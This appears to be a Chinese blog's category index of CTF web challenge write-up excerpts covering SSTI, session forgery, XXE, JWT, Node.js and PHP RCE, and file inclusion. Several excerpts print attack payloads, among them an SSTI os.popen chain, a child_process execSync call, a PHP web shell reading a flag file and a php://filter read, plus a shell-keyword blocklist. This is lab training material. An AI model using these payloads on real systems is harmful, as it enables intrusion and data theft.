随笔分类 - 刷题记录
7.1
摘要:# \[安洵杯 2020]Normal SSTI 过滤`{{}} [] config`和一系列常规的字符串 ```Python lipsum|attr("__globals__").get("os").popen("ls").read() ``` 用`{%print()%}`+unicode编码绕过
6.29
摘要:dg-publish: true # \[CISCN 2023 初赛\]go_session [session伪造] 三个路由 ```Go r.GET("/", route.Index) r.GET("/admin", route.Admin) r.GET("/flask", route.Flask
ctfshow终极考核
摘要:# 信息收集 > 这个环境就只涉及目录扫描了 ``` [18:04:02] 200 - 43B - /.bowerrc [18:04:03] 200 - 34B - /.gitignore [18:04:04] 200 - 2KB - /.travis.yml [18:04:24] 200 - 3K
XXE
摘要:https://xz.aliyun.com/t/3357 XXE XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是什么?XML外部实体。(看到这里肯定有人要说:你这不是在废话),固然,其实我这里废话只是想
JWT
摘要:jwt(JSON Web Token) 是一串 json 格式的字符串,由服务端用加密算法对信息签名来保证其完整性和不可伪造。Token 里可以包含所有必要信息,这样服务端就无需保存任何关于用户或会话的信息,JWT 可用于身份认证、会话状态维持、信息交换等。它的出现是为了在网络应用环境间传递声明而执
Nodejs
摘要:Nodejs-Web336 global.process.mainModule.constructor._load('child_process').execSync('ls') eval执行代码,过滤了exec,上面的payload用不了 网上搜集的payload require('child_p
文件包含
摘要:包含nginx日志 ua写一句话 日志路径/var/log/nginx/access.log 绕过死亡exit php://filter php://filter 是一种元封装器,设计用于数据流打开时的筛选过滤应用。这对于一体式(all-in-one)的文件函数非常有用,类似 readfile()、
RCE
摘要:RCE-Web32 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i",
Web10道签到题
摘要:题目1 万能密码 题目2 弱口令 admin 123456登录后台,文件管理上传 <?php system('cat /tmp/flag');?> 题目3 题目4 F12发现include.php include.php?file=php://filter/read=convert.base64-e
